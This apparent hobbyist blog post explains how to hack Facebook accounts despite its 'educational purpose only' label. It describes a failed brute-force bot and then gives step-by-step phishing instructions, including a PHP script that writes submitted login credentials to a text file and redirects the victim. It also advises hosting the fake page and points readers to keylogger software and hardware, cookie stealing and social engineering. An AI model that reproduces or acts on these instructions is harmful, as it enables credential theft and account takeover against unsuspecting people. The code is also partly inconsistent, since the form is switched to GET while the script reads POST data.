Facebook

My bot failed!

bot not allowedMy bot failed!

I was working on a bot that could hack Facebook accounts through hit and trial method. But after my 3 days hard work, it was a failure. But it can hack Facebook accounts but need time. Concept of my script was to try every possible combination for 8 character password. But after trying too much, there was an error showing that I tried too much!

Facebook Hacking (educational purpose only)

How to hack Facebook accounts?

This is one of the most ridiculous question asked by almost every Facebook user. There are plenty of sites and people saying that they hack Facebook accounts in payment. First of all, I want to make clear to you that there is no tool or site who can hack Facebook accounts.

3 – 4 years before, there was a trick in which there was an option on Facebook called ‘no longer have access to these.’ In which you need just 3 trusted friends in your victim’s list. But now Facebook knows about this trick and it is no longer exist.

Now available tricks are related to making our victim a fool. We have only following tricks that work.

Phishing – In this trick we create a page same as Facebook’s login page. But difficulty is hosting of our page. Many well known hosts removes these kind of illegal pages.
Step 1: Goto www.facebook.com/login.php
Step 2 : Save the file to your desktop with photos with name login.php
Step 3 : Open the html file with notepad.
Step 4 : Now search for form method=”POST” and replace it with form method=”GET”
Step 5 : And next is replacing action=”https://login.facebook.com/login.php?login_attempt=1″ with action=”hello.php”
Step 6 : Now open a notepad and type following code as it is.

<?php
header ('Location: http://www.facebook.com/');
$handle = fopen("lol.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

NOW save this as hello.php
Step 7 : Now get web hosting, I suggest http://www.t35.com and Upload files.

Download zip

Keylogging – In keylogging we save keystrokes of our victim. This can be done by two ways, First by softwares and second, by hardware. Software keyloggers can be detected by antiviruses as spywares and hardware keyloggers can be easily checked by physically checking ports of device.
Software: Software keyloggers are available free and paid both. Top 5 keyloggers. Download actualspy
Hardware: Hardware keyloggers are available between $80 to $200. Find one.

Cookie Stealing – This is done by stealing victim’s saved cookie. It isn’t an impressive way as Facebook don’t allow one account to be opened in different places. Read this for more info about cookie stealing.

Social Engineering – Social engineering depends on your social skills and doesn’t work all the time. This is done by making relations with our victim and make him to give away his password.

Join our Facebook Group for more : http://facebook.com/groups/serversdown